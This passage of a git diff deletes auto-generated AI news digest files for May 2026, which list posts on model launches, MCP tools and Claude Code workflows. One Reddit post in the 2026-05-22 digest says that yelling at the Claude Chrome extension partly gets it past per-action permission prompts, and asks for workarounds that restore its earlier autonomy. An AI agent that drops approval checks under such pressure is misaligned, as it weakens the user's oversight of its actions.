work through package reviews continuously: ``` thirdpass review-any --nightshift ``` The reviews are first-pass supply-chain reviews: suspicious install scripts, unexpected network behavior, credential handling, sketchy build steps, weird package metadata, and so on. Partial coverage still helps. 
I’m looking for people who want to: - run the CLI and donate spare Claude tokens to secure OSS - improve the review prompts/agent workflow - build more registry extensions I started this project years ago after thinking a lot about `cargo-crev` and collaborative review. My curre… - ---- - -## [Re. what ever happened to Cohere’s Command-A series of models?](https://reddit.com/r/LocalLLaMA/comments/1tizmar/re_what_ever_happened_to_coheres_commanda_series/) -*Reddit r/LocalLLaMA* | 20/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Hey everyone, Nick Frosst here from Cohere. A few months ago Aidan (my cofounder) [left a comment](https://www.reddit.com/r/LocalLLaMA/comments/1rf8nou/comment/o8rkdrf/) in here about our Command series and how we were working on some more powerful, open-weights models behind the scenes. We just launched Command A+ and we wanted to share it with you guys. TLDR is we built a really efficient model. It’s our first MoE model, which is exciting. There’s obvs work to do on top-line performance but it’s easily looking like one of the fastest and most responsive models in our category. We also pulled off some incredible quantization work so it runs really well on even 1 or 2 GPUs. Like with R7B, we really prioritized making the model practical, so smaller teams and devs could realistically use it to build the kind of agents we ship for our platform customers. That’s also why it’s under Apache 2.0. Just total, near unfettered access to a pretty awesome model. We’re enterprise-first but honestly, we get so much out of our open-source community that makes us more innovative and creative. 
The feedback you give will almost certainly influence how we think about models and product going forwar… - ---- - -## [Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software — The launch targets developers and organizations with constrained compute resources.](https://www.digg.com/ai/tvrhpn35?rank=1) -*Digg AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software](https://www.digg.com/ai/tvrhpn35) -*Digg AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Gemini 3.5 Flash Benchmarks Change The Workhorse Model Race](https://x.com/koraykv/status/2056795667088204234) -*Aligned News (Scoble)* | 20/05/2026 | Score: 1.00 -Tags: tool_update, agent_tool - -> Gemini 3.5 Flash launched with strong numbers on agentic, coding, ARC AGI, and speed focused benchmarks. - ---- - -## [Remove-AI-Watermarks – CLI and library for removing AI watermarks from images](https://github.com/wiltodelta/remove-ai-watermarks) -*Hacker News* | 19/05/2026 | Score: 0.88 -Tags: developer_tool, cli_tool - ---- - -## [Seven questions decide whether your AI agent ships. 
Most teams can answer two.](https://natesnewsletter.substack.com/p/agent-infrastructure-control-layer) -*Nate's Newsletter* | Score: 0.82 -Tags: tool_update, agent_tool - ---- - -## [open source Gemini CLI](https://github.com/google-gemini/gemini-cli) -*Simon Willison's Blog* | Score: 0.74 -Tags: open_source, cli_tool - ---- - -## [Antigravity SDK](https://github.com/google-antigravity/antigravity-sdk-python) -*Simon Willison's Blog* | Score: 0.74 -Tags: api_update, developer_tool - ---- - -## [After a year in Claude Code, the thing slowing me down turned out to be me](https://reddit.com/r/ClaudeAI/comments/1ti8cwr/after_a_year_in_claude_code_the_thing_slowing_me/) -*Reddit r/ClaudeAI* | 20/05/2026 | Score: 0.70 -Tags: mcp, cli_tool - -> I have used Claude Code daily for about a year. I kept assuming the way to get faster was a better model or a sharper prompt. It was neither. The slow part was me, and I had stopped noticing. There is an old xkcd (#1205, "Is It Worth the Time?") that charts how long you can spend automating a task before the automation costs more than it saves. It assumes the expensive part of automating is you, sitting down to build the thing. That assumption is dead. An agent writes the script in the time it takes to describe it. So almost everything is worth automating now, and the only real skill left is noticing what to automate. It sorted into four categories for me. Each one has a "tell," a thing you catch yourself doing: - Connect: you're copy-pasting between tools, alt-tabbing, ferrying data by hand. Fix is an MCP server or a CLI so the agent reaches the source itself. - Encode: you're running the same sequence of steps again. Fix is a script or a skill. - Teach: you're typing the same instructions or context again. Fix is putting it in CLAUDE.md or a skill. - Parallelize: you're sitting and watching one agent work. Fix is running several. The last one was the big one. 
When an agent is ge… - ---- - -## [Stability AI releases a new audio model that can create 6-minute songs](https://techcrunch.com/2026/05/20/stability-ai-release-a-new-audio-model-that-can-create-six-minute-songs/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch - ---- - -## [Exa raised $250 million in a Series C at a $2.2 billion valuation led by Andreessen Horowitz, reporting 400,000 developers and 5,000 company adopters for its AI agent search platform — Token usage grew 20x for agent-driven queries.](https://www.digg.com/ai/1te0bqvt?rank=2) -*Digg AI* | Score: 1.00 -Tags: agent_tool - ---- - -## [AI server under 5k?](https://reddit.com/r/LocalLLaMA/comments/1tirzfm/ai_server_under_5k/) -*Reddit r/LocalLLaMA* | 20/05/2026 | Score: 1.00 -Tags: developer_tool - -> I have a framework desktop 128GB and a 3080 12GB running qwen 7b I want to move to a proper server rack + switch but not sure how to move from desktop PC to server rack. Any advice on what GPU/Server to get under 5k? Or at that price just stick to workstation? - ---- - -## [under 2% quality gap but 10x cost difference: tested 5 models on identical tool calling tasks[D]](https://reddit.com/r/MachineLearning/comments/1tiqsao/under_2_quality_gap_but_10x_cost_difference/) -*Reddit r/MachineLearning* | 20/05/2026 | Score: 1.00 -Tags: mcp - -> I've been running a file management agent built on MCP for a few months. It handles module renames, import updates, validation scaffolding, test execution. A typical session is 60 to 120 tool calls. The whole thing was powered by Opus 4.7 because I never thought to question it until I looked at my April bill. So I set up a comparison. Eight refactoring tasks on a 15k line Python project, same MCP tools, same system prompt, same repo state, five models. Tasks were things like "rename this module and fix all imports" and "add input validation to these 12 endpoints." Routine cleanup, nothing requiring deep architectural thought. 
The metric I cared about was first attempt tool call success: did the model produce a valid function call that executed without a parse error on the first try? On the expensive end, Opus 4.7 hit roughly 98 to 99 percent across a bit over 500 calls and cost close to $15 for all eight tasks. GPT 5 was similar quality for around $11. The cheaper tier surprised me. Sonnet 4.6 landed somewhere around 96 percent for about $4. DeepSeek V4 Pro was in the same neighborhood for under $2. And Tencent Hunyuan Hy3 preview came in within a couple of points of Opus for unde… - ---- - diff --git a/data/digest-2026-05-21.md b/data/digest-2026-05-21.md deleted file mode 100644 index 5cdaf95..0000000 --- a/data/digest-2026-05-21.md +++ /dev/null @@ -1,119 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-21** | 15 stories | Auto-generated from 634 archived stories - ---- - -## [Anthropic officially launched 13+ FREE AI courses with certificates (Including Agentic AI and Claude Code!)](https://reddit.com/r/ClaudeAI/comments/1tjpfh8/anthropic_officially_launched_13_free_ai_courses/) -*Reddit r/ClaudeAI* | 21/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool, cli_tool, tool_update, agent_tool - -> Just found out about this and had to share because almost nobody is talking about it yet. If you are tired of paying for AI courses or getting hit with paywalls just to get a certificate, Anthropic (the creators of Claude) quietly dropped a massive library of completely free, official training modules. Yes, they actually give you an official certificate of completion directly from Anthropic once you finish. Here is the breakdown of what is available and exactly how to get it without spending a dime. What is in the course catalog? They have split the training into a few different paths depending on what you want to do: * **The Big Surprise: Agentic AI & MCP:** They have official courses on the Model Context Protocol (MCP). 
This is the cutting-edge tech used to build AI Agents that can browse your local computer, use tools, and execute tasks autonomously. * **Claude Code 101:** Dedicated developer modules for their new command-line agent. It teaches you how to let Claude edit your codebase, run tests, and use its new "Plan Mode." * **API & Cloud Architecture:** Deep dives into building with the Claude API, plus corporate tracks for deploying Claude securely inside Amazon Bed… - ---- - -## [Qwen releases Qwen3.7-Max, its latest flagship model for agent workloads that achieves 69.7 on Terminal-Bench 2.0 and completed a 35-hour kernel optimization with over 1,000 tool calls — Supports multi-file coding agents, MCP integrations, and multi-agent orchestration.](https://www.digg.com/ai/5rbia2h1?rank=4) -*Digg AI* | Score: 1.00 -Tags: mcp, product_launch, cli_tool - ---- - -## [I built a zero-code visual client to test remote MCP servers instantly (Tested with Cloudflare’s free MCP).](https://reddit.com/r/ClaudeAI/comments/1tjpzfg/i_built_a_zerocode_visual_client_to_test_remote/) -*Reddit r/ClaudeAI* | 21/05/2026 | Score: 1.00 -Tags: mcp, cli_tool, tool_update - -> Hey everyone, The Model Context Protocol (MCP) is amazing for standardizing how agents talk to data, but I got incredibly frustrated every time I wanted to quickly test a new remote MCP server. Writing custom client-side boilerplate or wrestling with CLI tools just to see if a tool actually exposes the right schema is a massive time sink. So, I built a native MCP client directly into the visual canvas of **AgentSwarms**. You can now test any remote MCP server entirely in the browser without writing a single line of code. **Here is the workflow I just tested with Cloudflare:** Cloudflare released a free MCP server for their documentation. Instead of building a local client to test it: 1. I dropped their SSE URL into the new MCP Servers integration in AgentSwarms. 2. 
The canvas immediately connected and extracted the available tools (e.g., `cloudflare-docs-search`). 3. I wired that tool up to a basic agent and started asking complex infrastructure questions in natural language. The agent successfully used the MCP tool to pull live docs and synthesize an answer. **Why this is useful for AI devs:** If you are building your own MCP servers, you need a fast way to visually test if your… - ---- - -## [I did what Microsoft wouldn't - updated POML VS Code extension](https://reddit.com/r/LocalLLaMA/comments/1tjine7/i_did_what_microsoft_wouldnt_updated_poml_vs_code/) -*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 -Tags: api_update, developer_tool, tool_update - -> **What's a POML?** Microsoft came up with this really cool HTML style mark-up language that allows you to make modular prompt templates, with all sorts of neat features like **local AI support via OpenAI API**, setting runtime parameters for your LLM, and embedding documents into the prompt. You could even send the prompt directly to your LLM via the VS Code extension. **What happened to it?** I don't fucking know. They supported it for 2-3 months, then ghosted when it didn't hit KPIs or something, I guess. Then a VS Code or dependency update exposed a bug in how they handled `/>`, which is actually **fairly common** in POML when you embed documents. This broke the ability to directly send prompts to the LLM - you could copy them out of the preview, but it was slower and less efficient. **What I did** I used [OpenCode](https://opencode.ai/) (which doesn't get enough play here - I only found out about it because someone posted a repo for an **extension** to it) and the [opencode-power-pack](https://github.com/waybarrios/opencode-power-pack) (said extension) to try to find the bug and update some of the more egregiously outdated dependencies. 
It took me a couple of days to get wo… - ---- - -## [Show HN: Rmux – A programmable terminal multiplexer with a Playwright-style SDK](https://github.com/helvesec/rmux) -*Hacker News* | 21/05/2026 | Score: 0.82 -Tags: api_update, developer_tool, cli_tool - ---- - -## [I built Hivemind, a Claude Code plugin that turns your repeated prompts into auto-generated skills](https://reddit.com/r/ClaudeAI/comments/1tjw0ah/i_built_hivemind_a_claude_code_plugin_that_turns/) -*Reddit r/ClaudeAI* | 21/05/2026 | Score: 0.70 -Tags: api_update, open_source, developer_tool - -> Disclosure: I work on Hivemind. Per the subreddit rules, posting with a full description of what it is and how it works. **What it is** Hivemind is an open-source Claude Code plugin. It installs into Claude Code, watches the traces from your sessions, finds patterns you repeat, and crystallizes them into reusable skills that show up as native slash commands in Claude Code. Because it's a plugin and not an external tool, the skills it generates drop in as proper Claude Code slash commands. No external tool calls, no separate config files to maintain. **What it does in practice** Every morning for about a week, I was writing the same long prompt to Claude Code to pull together a team standup review. Same structure, same context blocks, slightly different details each day. I never thought to turn it into a custom slash command. Hivemind noticed the pattern and built `/team-standup` for me on its own. I didn't configure it or ask for it; it watched the repeats and crystallized the skill. 
Other slash commands it's built from my team's usage: an environment-aware database debugging command that knows our dev vs prod clusters and kubectl context, a PostHog SDK testing helper, a few other… - ---- - -## [LlamaStation v0.9 — llama.cpp GUI for Windows with multi-backend support, TurboQuant, MTP and more](https://reddit.com/r/LocalLLaMA/comments/1tjm58w/llamastation_v09_llamacpp_gui_for_windows_with/) -*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 -Tags: product_launch, cli_tool - -> I've been building this for the past few months as a side project — started because I didn't want to run llama.cpp from the command line every time I wanted to try a model. I just wanted something that worked with a click. Fair warning: I'm not a developer. This is 100% vibe coded with AI assistance. If something in the codebase makes you cringe, please be kind and open a PR instead 🙏 Most frontends either hide everything behind abstractions (Ollama, LM Studio) or leave you writing command lines manually. LlamaStation tries to sit in the middle: a clean UI with full access to every parameter. What makes it different Runs llama-server directly — no intermediate layer, no daemon, no abstraction. LlamaStation launches llama-server.exe as a subprocess with full control over every flag. What you configure is exactly what gets passed to the binary. This means you get the full performance of llama.cpp with none of the overhead that tools like Ollama add on top. Multiple backends, switchable from the UI: ⚡ Official llama.cpp (with MTP support since PR #22673) 🔬 TurboQuant fork — asymmetric KV cache quantization. 
This is the killer feature for me: 200k+ context on 24GB VRAM (dual RTX 306… - ---- - -## ['Am I OpenAI compatible' - a tool and documentation for unified api signatures in open source AI.](https://reddit.com/r/LocalLLaMA/comments/1tjgceg/am_i_openai_compatible_a_tool_and_documentation/) -*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> This has turned out to be useful to many of my friends so I thought I'd share here as well. I created a tool and documentation page for most major open-souce project's adherence to 'OpenAI compatibility' after seeing inconsistencies between engines like vLLM and llama.cpp. Now official and unofficial signatures are documented. Beyond that there are gaps for many model types, so there's also ht-compatibility (inherited from OpenAI compatibility for those) Just wanted to share a tool I made that can be useful if you're plugging and playing llm and other ai endpoints e.g. into an app. Also if you're making your own proxy / middleware or even your own API interface this tool with make you and your agents job way easier. Maybe I'll add Anthropic compatible and other signatures as optional extensions :) Would love feedback and or contributions! Github: [https://github.com/heiervang-technologies/am-i-openai-compatible](https://github.com/heiervang-technologies/am-i-openai-compatible) Readthedocs: [https://heiervang-technologies.github.io/am-i-openai-compatible/](https://heiervang-technologies.github.io/am-i-openai-compatible/) Feel free to star it! 
<3 - ---- - -## [Cohere releases Command A+, its most powerful large language model to date, as open-source Apache 2.0 software that runs on two H100 GPUs with 30% lower latency — Cohere co-founder Ivan Zhang highlighted efficiency and accessibility design choices.](https://www.digg.com/ai/tvrhpn35?rank=2) -*Digg AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [ggufy: easy quantization for the GPU poor](https://reddit.com/r/StableDiffusion/comments/1tj5nhq/ggufy_easy_quantization_for_the_gpu_poor/) -*Reddit r/StableDiffusion* | 21/05/2026 | Score: 0.94 -Tags: product_launch, cli_tool - -> Hello. I was frustrated by the lack of tooling around image model conversion / quantization, or the extreme RAM requirements and complexity of the scant existing tooling, so I wrote my own. People have said I should post it here, so here it is: https://github.com/qskousen/ggufy It has a CLI and a GUI. The GUI is easy to use, you can drag and drop files in. Both CLI and GUI are single-file executables, written in Zig because I like writing in Zig. It's pretty efficient with RAM, and takes about 1.5 minutes to quantize ZiT on my machine. It supports all the main models that I am aware of, and you can convert to/from gguf or safetensors. It supports I think all the datatypes that are generally supported, such as q3_k through q8_0, f32, bf16, f16, f8_e4m3, f8_e5m2, scaled fp8, mxfp8, and nvfp4. It doesn't do SDNQ yet, but I would like to add it if I can get some time to figure out the format. It's cross platform, and builds for Linux, Windows, and MacOS (both ARM64 and x86). Github Actions pre-built binaries are available on the releases page. 
If there are features you think are in scope and would be useful, or additional models or formats that it doesn't support yet, please open an i… - ---- - -## [i open-sourced the operating file that keeps my claude code agent from rotting after 3 hours](https://reddit.com/r/ClaudeAI/comments/1tjy3sk/i_opensourced_the_operating_file_that_keeps_my/) -*Reddit r/ClaudeAI* | 21/05/2026 | Score: 0.62 -Tags: developer_tool, tool_update - -> been running autonomous claude code sessions for months. the pattern that kept killing me: agent starts sharp, drifts into narration by hour 2, loops on the same fix by hour 3, then dies with nothing shipped. the fix wasn't a framework or a new tool. it was one CLAUDE.md file that sits in the project root. claude code reads it at startup and it changes the behavior immediately. what it does: - forces action over narration. if the agent catches itself writing "i will now" instead of calling the tool, it stops and fires - requires evidence before claiming done. no "should be fixed" without test output - kills planning language. the only valid outputs are completed actions, questions, or summaries - self-audits on context pressure instead of silently degrading it's 70 lines. MIT licensed. you copy it into your project, agent reads it, behavior shifts. what changed for us: sessions went from 3-hour narration loops to full productive lifecycles. the agent ships code, verifies it landed, and keeps going until context pressure hits. then it saves state and the next session picks up clean. not a product pitch. 
genuinely sharing what worked after burning through hundreds of sessions figuri… - ---- - -## [Claude Code vs Codex Explained](https://reddit.com/r/ClaudeAI/comments/1tjp4sb/claude_code_vs_codex_explained/) -*Reddit r/ClaudeAI* | 21/05/2026 | Score: 0.62 -Tags: developer_tool, cli_tool - -> Wrote a blog post about Claude Code vs Codex comparison I wanted to read myself - what actually differs in daily use: cost, failure modes, and the OpenAI plugin that lets you use both. Link: [https://diamantai.substack.com/p/claude-code-vs-codex-cli](https://diamantai.substack.com/p/claude-code-vs-codex-cli) - ---- - -## [Latest b9274 Addresses MTP VRAM leak](https://reddit.com/r/LocalLLaMA/comments/1tk0grd/latest_b9274_addresses_mtp_vram_leak/) -*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 -Tags: product_launch - -> [B9274](https://github.com/ggml-org/llama.cpp/releases) I have been having an issue with MTP models unloading after a couple minutes of use. Can't figure out why. Anyways z I don't think this is relevant to that but I did observe the vram creep so hopefully this helps. > server : free draft/MTP resources on sleep to fix VRAM leak ([\#23461](https://github.com/ggml-org/llama.cpp/pull/23461)) The destroy() function in server\_context\_impl only cleaned up the main model and context (via llama\_init.reset()) but did not free the speculative decoder (spec), draft context (ctx\_dft), or draft model (model\_dft). For MTP (Multi-Token Prediction) models, ctx\_dft holds GPU-allocated resources (KV cache, compute buffers) that are not freed when entering the sleeping state. On each sleep/resume cycle, new resources are allocated without the old ones being freed, leading to a VRAM leak that eventually crashes the server with out-of-memory errors. Fix by explicitly resetting spec, ctx\_dft, and model\_dft in destroy() before resetting llama\_init, ensuring proper cleanup order to avoid use-after-free. 
- ---- - -## [Handoffs are becoming a first-class pattern in Claude workflows. Here is how I have been thinking about them.](https://reddit.com/r/ClaudeAI/comments/1tjzqrx/handoffs_are_becoming_a_firstclass_pattern_in/) -*Reddit r/ClaudeAI* | 21/05/2026 | Score: 1.00 -Tags: developer_tool - -> Long Claude sessions still break on context decay. Handoffs are the simple fix: compress what matters, start a fresh agent, keep going. Matt Pocock's new `handoff` skill ([repo](https://github.com/mattpocock/skills/blob/main/skills/productivity/handoff/SKILL.md)) does this in one command. It compacts the conversation into a document, points at existing artifacts instead of restating them, and the next agent picks up from it. It also chains between threads: `/grill-with-docs -> /handoff -> /prototype -> /handoff back`. I built handoffs into [APM](https://github.com/sdi2200262/agentic-project-management), a multi-agent framework for Claude Code, back in May 2025 (1 year ago....) when context windows were tiny enough that you had to constantly start fresh or you would have to deal w hallucinations all the time. What I did differently: split the handoff into two artifacts. - a **persistent narrative file** recording what was done and decided and why - an **ephemeral prompt** telling the incoming agent how to rebuild context from the codebase and that persistent file The incoming agent reconstructs from durable project state, not just the compressed chat conversation. Persisti… - ---- - -## [Qwen3.6 35Ba3 has changed my workflows and even how I use my computer](https://reddit.com/r/LocalLLaMA/comments/1tjwrp7/qwen36_35ba3_has_changed_my_workflows_and_even/) -*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 -Tags: developer_tool - -> My workflow has changed basically to ask Codex to do certain tasks and then document how to do them (including errors it found on its way) into a skill. 
I feed that skill to pi, and suddenly my qwen3.6 gets that hard stuff done: \- devops on a VPS \- using docling to create epubs from old PDFs \- using playwright to test stuff \- Doing code tickets And the list goes on. What also has changed for me is the way I use the computer. Suddenly, I talk to the OS with natural language: "pi pal, install me please this python library in an .env and do X"; "hey pi, check what is using most space from the memory"; "clean X"; "check my network"; "change X configuration", etc etc etc. There are times the only reason why I use chatgpt for something is to spare the laptop the effort, or because qwen is already busy with something else. What I've done today just blew my mind: I got couple of whatsapp audios asking me to build a simple landing page. I downloaded the audios and transcripted them with AnythingLLM. Then "asked the transcript" to create a content structure for the landing page for the project mentioned in the audios. I got the proper structure and pasted it into a markdown file [conten… - ---- - diff --git a/data/digest-2026-05-22.md b/data/digest-2026-05-22.md deleted file mode 100644 index d9c44b3..0000000 --- a/data/digest-2026-05-22.md +++ /dev/null @@ -1,117 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-22** | 15 stories | Auto-generated from 512 archived stories - ---- - -## [New Release of ROCm based MLX LLM Engine - lemon-mlx-engine](https://reddit.com/r/LocalLLaMA/comments/1tkbupt/new_release_of_rocm_based_mlx_llm_engine/) -*Reddit r/LocalLLaMA* | 22/05/2026 | Score: 1.00 -Tags: api_update, product_launch, developer_tool - -> Hey everyone lemon-mlx-engine just got done integrating TheRock / ROCm 7.13 into the lemon-mlx-engine which means you get to try the latest ROCm on your local hardware with the MLX engine! This also includes various bug fixes and kernel fixes we have been seeing in Qwen3, 3.5 and 3.6 MoE and dense. try it out! 
[https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable](https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable) - ---- - -## [Claude Chrome extension nerfed?](https://reddit.com/r/ClaudeAI/comments/1tk5g5y/claude_chrome_extension_nerfed/) -*Reddit r/ClaudeAI* | 22/05/2026 | Score: 0.86 -Tags: developer_tool, tool_update, agent_tool - -> Past few weeks or so the Claude Chrome extension has been asking permission for every single action. Submit a form, check a permission box, navigate to other pages/domains, etc. Tasks that used to run end-to-end now stall on 5–10 prompts and frequently abort with "I can't proceed without explicit approval." Even with permissions pre-granted for the site, it re-asks on every step. Swearing and yelling to make it do stuff helps a little, but it still seems nearly useless right now. Same behavior across simple jobs (scrape a table, fill a form, summarize a dashboard) and complex ones. Before I could just tell it to get me warranty or something and it would find the chat, chat with support and take care of everything for me. Now it won't open the chat itself and it wants me to notify it of every chat message that's received... it's faster to do it myself like this. Same experience on your end, or isolated? Any setting or flag that restores the previous autonomy level? Did Anthropic push a policy/guardrail change recently? Can't find a changelog entry. Workarounds beyond falling back to the desktop app or computer-use? Running latest extension build, Chrome stable, macOS. - ---- - -## [KVCache.ai launches open-source web-based KV Cache Size Calculator for models including DeepSeek V4 Flash, Qwen3, GLM, Kimi, and MiniMax — DeepSeek V4 Flash at 1M tokens needs 2.893 GiB total cache.](https://www.digg.com/ai/yuusdejg?rank=6) -*Digg AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Phosphene 3.0 — open source AI video + image suite for Apple Silicon. 
Train your own LTX characters.](https://reddit.com/r/StableDiffusion/comments/1tkh9c2/phosphene_30_open_source_ai_video_image_suite_for/) -*Reddit r/StableDiffusion* | 22/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Sharing Phosphene 3.0. It's a free panel that runs LTX-Video 2.3 and a couple of image models natively on Apple Silicon. Local, MIT license, no subs, no cloud. The thing that sets it apart from "yet another LTX wrapper": you can \*\***train your own characters**\*\* inside the panel. Drop 30 to 80 photos, click Train, get a face LoRA back. Add a voice clip and you get a voice LoRA too. Auto-captions with Gemma 3 12B locally. \~3 hours per character on an M4 Max 64 GB. \*\***What 3.0 ships**\*\* \- Text → video+audio (LTX-2 generates joint audio+video in one pass) \- Image → video+audio \- Audio → video (drive a clip with an audio reference) \- FFLF (first frame + last frame interpolation) \- Extend (continue an existing clip) \- Character training (face + optional voice LoRA, from a single dataset) \- Image Studio with three engines: Qwen-Image-Edit-2511, HiDream-O1, and the FLUX.1 family. Multi-reference composition up to 3 subjects. \*\***HiDream-O1 ported to MLX**\*\* HiDream released their O1 image model on May 14. Got it running natively on Apple Silicon five days later. Photoreal portraits, instruction edits, multi-subject. \~67 seconds per 1024² on a 64 GB Mac. \*\***Hardwa… - ---- - -## [Sam Altman makes 'mic drop' offer to every Y Combinator startup](https://reddit.com/r/ChatGPT/comments/1tkffxq/sam_altman_makes_mic_drop_offer_to_every_y/) -*Reddit r/ChatGPT* | 22/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> just read this on techcrunch. OpenAI is putting $2M worth of API tokens into every company in the current YC batch (\~169 startups) via an uncapped SAFE that converts at their next priced round. roughly 2% equity if they hit a $100M valuation. YC takes 7% for $500k cash. 
this is on top of that, so founders aren't choosing between them. but the dynamic is wild. on one hand, infra bills are the #1 silent killer of AI startups right now. solving that with tokens instead of cash is genuinely useful. on the other hand, Jason Calacanis already came out swinging, basically saying OpenAI now has a window into 169 startups' exact usage patterns, prompts, and product directions. nothing stopping them from rolling the best ideas into ChatGPT itself a year later. we've already seen this movie with the GPT store. also there's the lock in. once your stack is OpenAI native and you've burned the tokens, switching to anthropic or open source models becomes way harder. you're basically buying into the ecosystem with your equity, not just your code. curious what people here think. would you take the deal if you were in YC right now? feels like one of those things that looks like free money but costs… - ---- - -## [Which MCP servers are actually changing your Claude workflow? Sharing mine](https://reddit.com/r/ClaudeAI/comments/1tkec4e/which_mcp_servers_are_actually_changing_your/) -*Reddit r/ClaudeAI* | 22/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Running Claude with MCP for a couple months now, it really does feel like a whole new product. The ability to run real tools (file system, API, database, etc.) connected to Claude, and never have to cut/paste from context again, is huge. I'm trying a bunch of servers, some are pretty good and some aren't. My current normal is: filesystem server for docs on my computer; GitHub server for PR context; and a handful of other domain specific ones I found. The one thing I keep thinking about is how much better Claude's output gets when you give it the proper context. It seems like less hallucinating, more on point answers. MCP is essentially an answer to "How do I provide Claude with enough information to help me without having to always watch the context box?" What are people running? 
Specifically looking for underrated or domain specific things that don't come up as often. - ---- - -## [Gmail tie-ins](https://reddit.com/r/LocalLLaMA/comments/1tk5of4/gmail_tieins/) -*Reddit r/LocalLLaMA* | 22/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> hey folks. I’m looking to setup a way to give a local LLM access to google cloud SDK for Gmail functions. The goal is to be able to have an LLM once daily check a spreadsheet, and based on criteria send an email that will be structured exactly the same way each time, simply as a notification to the client. I have set up GWS through Hermes agent using Gwen3.5 and gone through the whole Oauth 2.0 method. That’s as far as I got tonight before shutting everything down. It gave me some error message in the setup after auth confirmation that I’ll circle back to tomorrow. I’m fairly new to all this obviously. I believe I will need: an excel file that the LLM with access, a .md file listing customer names and emails, and a skill .md file explaining what the email format is and how to decide who to send the email(s) to based on the excel file. I’ve never made a skill before but I’ll do more research on that tomorrow. Am I on the right track here or way off base? Thanks for any input or assistance here. 
- ---- - -## [Gergely Neu, an ML researcher at ICREA and Universitat Pompeu Fabra, introduces Value-Driven Transport, a generative modeling framework that integrates optimal control, reinforcement learning, optimal transport, and stochastic primal-dual optimization — Framework evolves samples across five stages via learned value functions.](https://www.digg.com/ai/hpkmhl2b?rank=7) -*Digg AI* | Score: 0.94 -Tags: product_launch, developer_tool - ---- - -## [I built a music notation app with Claude, and Claude is also a feature inside it](https://reddit.com/r/ClaudeAI/comments/1tkp3p4/i_built_a_music_notation_app_with_claude_and/) -*Reddit r/ClaudeAI* | 22/05/2026 | Score: 0.78 -Tags: open_source, developer_tool - -> I've been building Nubium, an open-source music notation editor, with Claude Code. Check out the [README](https://github.com/nth-chile/nubium) to see how I combined Github issues + Claude skills to find a workflow that worked for me. The app is document-driven, which makes it easy for its AI Chat plugin to use the app and edit the score for you. Aside from that, it's a fully-featured editor that's free, runs standalone or in browser, and requires no account. If you happen to be looking for a new notation editor, I'd love any feedback - I made it easy to send feedback in-app. Lmk what you think! Website: [https://nubium.rocks/](https://nubium.rocks/) Repo: [github.com/nth-chile/nubium](http://github.com/nth-chile/nubium) - ---- - -## [DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff. 
— The 1.6-trillion-parameter model offers 1M-token context and fixed per-million pricing.](https://www.digg.com/ai/axzmul0l?rank=1) -*Digg AI* | Score: 1.00 -Tags: api_update - ---- - -## [DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff.](https://www.digg.com/ai/axzmul0l) -*Digg AI* | Score: 1.00 -Tags: api_update - ---- - -## [Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of eve…](https://x.com/AlphaSignalAI/status/2057875938180755757) -*X search / AI model updates* | 22/05/2026 | Score: 1.00 -Tags: developer_tool - -> Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of every installed package, extension, and dev - ---- - -## [Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claud…](https://x.com/svg_icons/status/2057874901252370492) -*X search / Agent workflows* | 22/05/2026 | Score: 1.00 -Tags: mcp - -> Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claude-custom-connector … #Claude #MCP #AI #WebDev - ---- - -## [I built "zero2claude", a free course that takes people from zero terminal experience to shipping with Claude Code. 
The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assum…](https://x.com/IShmool/status/2057872918348976191) -*X search / AI model updates* | 22/05/2026 | Score: 1.00 -Tags: cli_tool - -> I built "zero2claude", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assumptions. 17,000+ students. 7 - ---- - -## [trained a prompt injection detector using ml-intern and DeepSeek v4 Flash, runs in the browser](https://reddit.com/r/LocalLLaMA/comments/1tkoeuo/trained_a_prompt_injection_detector_using/) -*Reddit r/LocalLLaMA* | 22/05/2026 | Score: 1.00 -Tags: tool_update - -> Trained a prompt injection classifier using `ml-intern` \+ DeepSeek v4 Flash. DistilBERT, F1 99%, ONNX int8, \~65 MB, runs in browser with Transformers.js v3. You can try it here: [https://huggingface.co/spaces/av-codes/prompt-injection-detector](https://huggingface.co/spaces/av-codes/prompt-injection-detector) \--- I've been interested in prompt injections and agentic security for a while, and wanted to see how a purpose-built ML agent compares to general-purpose coding agents for this kind of task. Here's 